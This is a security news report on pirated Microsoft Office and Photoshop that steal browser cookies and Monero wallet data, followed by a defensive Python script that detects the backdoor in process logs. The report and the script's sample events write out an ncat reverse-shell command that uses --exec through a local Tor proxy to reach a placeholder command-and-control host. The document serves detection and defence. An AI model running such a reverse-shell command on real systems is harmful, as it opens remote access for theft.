Pirated Microsoft Office and Photoshop Steal Data and Cryptocurrency

Security experts at Bitdefender have warned that cracked copies of Microsoft Office and Adobe Photoshop are stealing browser cookies and Monero cryptocurrency wallet data from users who install pirated software.

According to the researchers, some pirated versions of both programs come bundled with malware that steals browser session cookies (and, in the case of Firefox, the entire user profile history), captures Monero cryptocurrency wallet data, and exfiltrates other data via BitTorrent. The malware first opens a backdoor on the target machine and disables the firewall.

Once the cracked program is launched, it installs an instance of ncat.exe (a legitimate tool for sending raw data over a network) and uses a batch file called chknap.bat, as well as a Tor proxy.

"These tools work together to create a powerful backdoor that exchanges data with a command-and-control server via Tor: the ncat binary listens on the Tor proxy port (--proxy 127.0.0.1:9075) and uses the --exec parameter, which allows all client input to be sent to the application, and responses to be sent back to the client through the socket (typical reverse shell behavior)," the researchers explain.

The malware operators behind this attack take considerable time to analyze the compromised environment and decide what is worth stealing. Analysts believe that stealing the entire Firefox profile was likely accidental rather than intentional, and that the attackers would target any other browser installed on the device as well.
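A defender-side check for the pattern the researchers describe, added here as an example and not code from the report or from Bitdefender: it scans process-creation log lines for ncat launched with --exec together with --proxy 127.0.0.1:9075, and for the chknap.bat helper. The key=value event format, the SAMPLE_EVENTS lines and the remote-host placeholder are constructed assumptions; -e is assumed as ncat's short form of --exec.

```python
import re
import shlex

# Values quoted in the report above; everything in SAMPLE_EVENTS is constructed.
TOR_PROXY = "127.0.0.1:9075"
EXEC_FLAGS = {"--exec", "-e"}        # -e assumed as the short form of --exec
DROPPED_SCRIPT = "chknap.bat"

# Constructed key=value process-creation events (Sysmon-style field names).
SAMPLE_EVENTS = [
    'ProcessCreate Image=C:\\Users\\Public\\ncat.exe CommandLine="ncat.exe --proxy 127.0.0.1:9075 --exec cmd.exe c2-host-placeholder 443"',
    'ProcessCreate Image=C:\\Windows\\System32\\cmd.exe CommandLine="cmd.exe /c chknap.bat"',
    'ProcessCreate Image=C:\\Tools\\ncat.exe CommandLine="ncat.exe -l 8080"',   # benign admin use
    'ProcessCreate Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe"',
]

EVENT_RE = re.compile(r'Image=(?P<image>\S+)\s+CommandLine="(?P<cmd>[^"]*)"')


def parse_event(line):
    """Pull the Image and CommandLine fields out of one event line."""
    m = EVENT_RE.search(line)
    return (m.group("image"), m.group("cmd")) if m else (None, None)


def indicators(command_line):
    """Name each backdoor trait present in a command line; [] means nothing matched."""
    argv = shlex.split(command_line, posix=False)   # keep Windows backslashes intact
    if not argv:
        return []
    exe = argv[0].rsplit("\\", 1)[-1].lower()
    found = []
    if exe in ("ncat", "ncat.exe"):
        if EXEC_FLAGS & set(argv):
            found.append("ncat-exec")             # socket wired to a program: reverse-shell shape
        for flag, value in zip(argv, argv[1:]):
            if flag == "--proxy" and value == TOR_PROXY:
                found.append("ncat-tor-proxy")    # relayed through the local Tor SOCKS port
    if any(a.lower().endswith(DROPPED_SCRIPT) for a in argv):
        found.append("chknap-bat")
    return found


def scan(lines):
    """Return (image, indicators) for every event that matched at least one trait."""
    hits = []
    for line in lines:
        image, cmd = parse_event(line)
        if cmd is not None and indicators(cmd):
            hits.append((image, indicators(cmd)))
    return hits


if __name__ == "__main__":
    for image, found in scan(SAMPLE_EVENTS):
        print(image, "->", ", ".join(found))
```

An event carrying both ncat-exec and ncat-tor-proxy is the combination the researchers describe; chknap-bat on its own is a weaker signal and is worth correlating with the other two on the same host.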
